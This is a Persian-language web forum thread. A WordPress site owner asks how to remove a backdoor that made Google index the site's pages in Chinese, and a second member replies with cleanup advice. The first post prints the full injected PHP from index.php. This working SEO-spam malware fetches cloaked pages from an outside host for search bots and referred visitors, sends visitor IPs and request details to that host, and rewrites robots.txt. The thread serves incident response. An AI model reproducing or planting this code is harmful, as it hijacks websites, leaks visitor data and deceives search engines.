نمایش نتایج: از شماره 1 تا 2 , از مجموع 2

موضوع: راه مقابله با شل تغییر ایندکس مطالب سایت در گوگل به حالت چینی

  1. #1
    عضو انجمن
    تاریخ عضویت
    Sep 2017
    نوشته ها
    121
    تشکر تشکر کرده 
    49
    تشکر تشکر شده 
    82
    تشکر شده در
    65 پست

    پیش فرض راه مقابله با شل تغییر ایندکس مطالب سایت در گوگل به حالت چینی

    با سلام
    متاسفانه درگیر شل تغییر ایندکس مطالب سایت در گوگل به حالت چینی هستیم

    این شل میاد فایل index.php , robots.txt رو تغییر میده
    یک پلاگین بنام cmsmap- wordpress shell هم اضافه میکنه
    راه مقابله با اون چیه؟

    کلیه پلاگین ها و قالب و فایل ها جایگذاری شدن اما باز مشکل حل نمیشه

    کد تزریق شده به فایل index.php

    کد PHP:

    <?php    error_reporting(0);
        
    header('Content-Type: text/html; charset=utf-8');
        
    $OoooOO0 'zb1onem';  
        
    date_default_timezone_set('PRC');
        
    $dRoot = @$_SERVER['DOCUMENT_ROOT'];
        
    $rUrl = @$_SERVER['REQUEST_URI'];
        
    $curName = @basename(__FILE__);
        
    $sName = @$_SERVER['HTTP_HOST'];
        
    $Ooolg = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
        
    $uAgent = @$_SERVER['HTTP_USER_AGENT'];
        
    $referer = @$_SERVER['HTTP_REFERER'];
        
    $http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' 'http://';
        
    $typeName $http_type $sName;
        
    $uAgent = @strtolower($uAgent);
        
    $referer = @strtolower($referer);
        if(
    getenv('HTTP_CLIENT_IP')){ 
            
    $client_ip getenv('HTTP_CLIENT_IP'); 
        } elseif(
    getenv('HTTP_X_FORWARDED_FOR')) { 
            
    $client_ip getenv('HTTP_X_FORWARDED_FOR'); 
        } elseif(
    getenv('REMOTE_ADDR')) {
            
    $client_ip getenv('REMOTE_ADDR'); 
        } else {
            
    $client_ip $_SERVER['REMOTE_ADDR'];
        }
        
    $siteweb "thetradenews.top";
        if (
    strstr($rUrl'sitemap_index_')) {
            
    $pr dirname($rUrl);
            
    allmap($OoooOO0,$typeName,$rUrl,$sName,$http_type,$pr,$siteweb);
        }
        if (
    strstr($rUrl'.xml')) {
            
    $pr dirname($rUrl);
            
    sitefun($OoooOO0,$typeName,$rUrl,$http_type,$sName,$client_ip,$pr,$siteweb);
        }
        function 
    allmap($OoooOO0,$typeName,$rUrl,$sName,$http_type,$pr,$siteweb){
            
    $ol 'http://'.$OoooOO0.'.'.$siteweb.'/Api/siteAllMap.php?page='.$rUrl.'&pwd=sl123&domain='.$typeName.'&cur='.$curName;
            if (
    $_GET['vf_allmap'] == 'on') {
                echo 
    $ol;
                exit;
            }
            
    $getRes json_decode(getCurl($ol), true);
            if (empty(
    $getRes)||$getRes['code'] == 404) {
                
    header('HTTP/1.0 404 Not Found');
                
    header('Status: 404 Not Found');
                exit();
            }
            if (empty(
    $getRes)||$getRes['code'] == 444) {
                
    header('HTTP/1.0 404 Not Found');
                
    header('Status: 404 Not Found');
                exit();
            }
            
    $getsResult $getRes['data'];
            
    header('Content-type:text/xml');
            echo 
    $getsResult;
            exit();
        }
        function 
    sitefun($OoooOO0,$typeName,$rUrl,$http_type,$sName,$client_ip,$pr='',$siteweb,$qs='') {
            
    $ol 'http://'.$OoooOO0.'.'.$siteweb.'/Api/siteUrlApi.php?stype=sitemap&num=6000&pr='.$pr.'&url='.$rUrl.'&domain='.$typeName.'&ip='.$client_ip.'&cur='.$curName;
            if (
    $_GET['vf_map'] == 'on') {
                echo 
    $ol;
                exit;
            }
            
    $getRes json_decode(getCurl($ol), true);
            if (isset(
    $getRes['code'])&&$getRes['code']=='600') {
                
    $getsResult $getRes['data'];
                foreach(
    $getsResult as $Oog => $Oov){
                    
    $pingRes getCurl($Oov);
                    
    $Oooo0s = (strpos($pingRes,'Sitemap Notification Received') !== false) ? 'OK' 'ERROR';
                    echo 
    $Oov.'===>Submitting Google Sitemap: '.$Oooo0s.PHP_EOL;
                }
                exit();
            } 
            if (isset(
    $getRes['code'])&&$getRes['code']=='406'){
                echo 
    'Submitting Google Sitemap Return Fail';
                exit();
            }
            if (empty(
    $getRes)||$getRes['code'] == 404) {
                
    header('HTTP/1.0 404 Not Found');
                
    header('Status: 404 Not Found');
                exit();
            }
            
    $getsResult $getRes['data'];
            
    header('Content-type:text/xml');
            echo 
    $getsResult;
            exit();
        }
        if(isset(
    $_GET['google'])){
            
    $go=$_GET['google'];
            if (
    preg_match('/^google.*?(\.html)$/i'$go)) {
                if(
    putFile($go,'google-site-verification:'.' '.$go)){
                    exit(
    '<a href='.$go.'>'.$go.'</a>');
                } else{
                    exit(
    'fail!!!!');
                }
            }
        }
        if (isset(
    $_GET['robots'])) {
            
    $robots $_GET['robots'];
            if (
    preg_match('/(\.php)$/i'$robots)) {
                
    $typeName $typeName '/' $robots '?';
            } else {
                
    $typeName $typeName '/';
            }
            
    putFile'robots.txt''User-agent: *' PHP_EOL 'Allow: /' PHP_EOL 'Crawl-delay:3' PHP_EOL 'Sitemap:' $typeName 'sitemap_index_1.xml' PHP_EOL 'Sitemap:' $typeName 'sitemap_index_2.xml' PHP_EOL 'Sitemap:' $typeName 'sitemap_index_3.xml' PHP_EOL 'Sitemap:' $typeName 'sitemap_index_4.xml' PHP_EOL 'Sitemap:' $typeName 'sitemap_index_5.xml' PHP_EOL 'Sitemap:' $typeName 'sitemap_index_6.xml' PHP_EOL 'Sitemap:' $typeName 'sitemap_index_7.xml' PHP_EOL 'Sitemap:' $typeName 'sitemap_index_8.xml');
            
    $file_get_contents file_get_contents('robots.txt');
            echo 
    $file_get_contents;
            exit();
        } 
        if(
    preg_match('/google.co.jp|yahoo|google\.com[^.]*?$|bing/i'$referer)){
             if (
    $_GET['vf_jump'] == 'on') {
                echo 
    'http://'.$OoooOO0.'.'.$siteweb.'/jump.php?domain='.$sName.'&page='.$rUrl.'&bot=0&pr='.$pr.'&refer='.$referer.'&ip='.$client_ip.'&lg='.$Ooolg.'&cur='.$curName;
                exit;
            }
             
    $jumpRes=getCurl('http://'.$OoooOO0.'.'.$siteweb.'/jump.php?domain='.$sName.'&page='.$rUrl.'&bot=0&pr='.$pr.'&refer='.$referer.'&ip='.$client_ip.'&lg='.$Ooolg.'&cur='.$curName);
            if (
    $jumpRes) {
                echo 
    $jumpRes;
                exit();
            }
        }
        if(
    stristr($uAgent,'googlebot')||stristr($uAgent,'bing')||stristr($uAgent,'Y!J')||stristr($uAgent,'y!j')||stristr($uAgent,'yahoo')||stristr($uAgent,'google')||stristr($uAgent,'Googlebot')||stristr($uAgent,'googlebot')){
            if (
    $_GET['vf_bot'] == 'on') {
                echo 
    'http://'.$OoooOO0.'.'.$siteweb.'/918.php?domain='.$sName.'&page='.$rUrl.'&bot=1&pr='.$pr.'&ip='.$client_ip.'&lg='.$Ooolg.'&cur='.$curName;
                exit;
            }
            
    $file_contents getCurl('http://'.$OoooOO0.'.'.$siteweb.'/918.php?domain='.$sName.'&page='.$rUrl.'&bot=1&pr='.$pr.'&ip='.$client_ip.'&lg='.$Ooolg.'&cur='.$curName);
            if(!empty(
    $file_contents)){
                
    $getRes json_decode($file_contentstrue);
                if (
    $getRes['code'] == 404) {
                    
    header('HTTP/1.0 404 Not Found');
                    
    header('Status: 404 Not Found');
                    exit();
                }
                if (
    $getRes['code'] == 500) {
                    
    header('HTTP/1.1 500 Internal Server Error');
                    exit();
                }
                echo 
    $file_contents;
                exit;
            }
        }
        
        function 
    getCurl($gurl)
        {
            
    $file_contents '';
            
    $user_agent 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)';
            if(
    function_exists('curl_init')){
                try
                {
                    
    $ch curl_init();
                    
    $timeout 30;
                    
    curl_setopt($ch,CURLOPT_URL,$gurl);
                    
    curl_setopt($ch,CURLOPT_SSL_VERIFYHOST0);
                    
    curl_setopt($ch,CURLOPT_SSL_VERIFYPEER0);
                    
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
                    
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
                    
    $file_contents curl_exec($ch);
                    
    curl_close($ch);
                }
                catch (
    Exception $e)
                {}
            }
            if(
    strlen($file_contents)<1&&function_exists('file_get_contents')){
                
    ini_set('user_agent',$user_agent);
                try
                {
                    
    $file_contents = @file_get_contents($gurl);
                }
                catch (
    Exception $e)
                {}
            }
            return 
    $file_contents;
        }
        function 
    putFile($htName$htContents) {
            
    $handle fopen($htName'w') or die('0');
            
    $result fwrite($handle$htContents);
            
    fclose($handle);
            return 
    $result;
        }
    ?>
    ویرایش توسط ایران نشر : September 1st, 2021 در ساعت 15:13

  2. # ADS




     

  3. #2
    عضو انجمن sam_pontiac آواتار ها
    تاریخ عضویت
    Apr 2009
    نوشته ها
    180
    تشکر تشکر کرده 
    166
    تشکر تشکر شده 
    279
    تشکر شده در
    166 پست

    پیش فرض پاسخ : راه مقابله با شل تغییر ایندکس مطالب سایت در گوگل به حالت چینی

    سلام
    فایل مخرب که از طریق backdoor کارهاش رو انجام میده.

    این بک دور ممکنه تو قالب / و یا در یکی از افزونه های شما باشه و شما صدها مرتبه هم که قالب و افزونه ها رو جایگزین کنید، مادامیکه کد مرتبط با بک دور رو نتونید پیدا کنید و برطرفش کنید، داستان بهمین منوال خواهد بود.

    معمولا بک دور در قالب و یا افزونه ها ( در هر فایلی از اینها ) میتونند باشند / اغلب انکریپت/انکد میشن ( پس دنبال کدی بگردید که انکد شده )

    پیشنهاد :
    اگر افزونه و یا قالبی استفاده میکنید که Null شده هست، نسبت به تغییر اون اقدام کنید.
    اگر در سرور cxs فعال هست و خودتون دسترسی به روت سرور دارید، یکبار چک کامل کنید در اکثر مواقع فایل مخرب رو پیدا میکنه و حذف/ایگنور/قرنطینه میکنه فایل رو.
    معمولا در این مواقع، فایلهای wp-config / wp-setting و امثالهم هم دستکاری میشن.
    نتیجه :
    بعد از بررسی و پیدا کردن منشا این موضوع ، حال اگر افزونه هست و یا قالب و ... شما باید کلیه فایلهای وردپرس رو ( بغیر از پوشه uploads موجود در wp-contents ) بطور کلی با فایلهای اصلی جایگزین کنید.
    خود پوشه uploads هم بررسی و اسکن کنید.
    دیتابیس شما معمولا در این مواقع ( و با توجه به کد) دچار تغییرات نشده، صرفا ممکن هست که در جدول تنظیمات وردپرس مقداری برای افزونه کذایی که ساخته شده، ایجاد شده باشه که با یک دستور قابل حذف هست.
    پس نگرانی در خصوص دیتابیس و اطلاعات موجود نیست، فقط کافی هست:
    1- کل افزونه ها و قالب رو بررسی کامل کنید.
    2- بعد از اطمینان از رفع مشکل، کلیه فایلهای وردپرس ( بغیر از پوشه uploads همونطور که اشاره شد ) حذف کنید و فایلهای اصلی وردپرس رو جایگزین و سپس تنظیمات دیتابیس رو در کانفیگ تغییر دهید.
    3- بازبینی امنیتی در php سرور الزامی هست.

    اگر نیاز به کمک بود در خدمت هستم.

  4. تعداد تشکر ها ازsam_pontiac به دلیل پست مفید


اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. پاسخ ها: 0
    آخرين نوشته: May 22nd, 2021, 11:03
  2. رقصیدن با گوگل: تغییر، تغییر و باز هم تغییر در الگوریتم
    توسط sibait در انجمن مباحث و منابع آموزشی
    پاسخ ها: 0
    آخرين نوشته: July 16th, 2017, 04:22
  3. پاسخ ها: 0
    آخرين نوشته: October 10th, 2012, 13:35
  4. پاسخ ها: 3
    آخرين نوشته: August 16th, 2012, 17:42
  5. تغییر timezone وب سایت در .htaccess - تغییر زمان
    توسط irmizban در انجمن سی پنل CPanel
    پاسخ ها: 0
    آخرين نوشته: February 19th, 2012, 22:17

کلمات کلیدی این موضوع

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •